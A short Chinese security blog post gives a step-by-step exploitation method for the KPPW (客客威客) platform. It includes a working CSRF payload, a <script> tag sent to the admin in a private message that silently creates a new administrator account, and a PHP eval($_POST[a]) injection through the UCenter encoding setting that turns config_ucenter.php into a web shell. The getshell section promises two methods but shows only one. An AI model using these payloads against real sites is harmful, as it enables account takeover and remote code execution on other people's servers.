漏洞播报:客客威客系统CSRF+getshell漏洞利用方法

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

1.注册会员

 
2.

http://127.0.0.1/index.php?do=user&view=message&msg_type=write

 

 
3,发送给admin,下面是csrf,目的是加一个管理员,账户kppw 密码kppwkppw
<script src=http://127.0.0.1/control/admin/index.php?do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword
%5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw.com&fds%5Bgroup_id%5D=1&is_submit=1 ></script>

 

 
4,getshell方法有两个
(1)gpc off 全局配置 会员整合 UCENTER 编码 修改为’);eval($_POST[a])?>; 
连接http://127.0.0.1/config/config_ucenter.php 
 
 
 
 
作者:take

Tags:

客客威客漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
漏洞播报:客客威客系统CSRF+getshell漏洞利用方法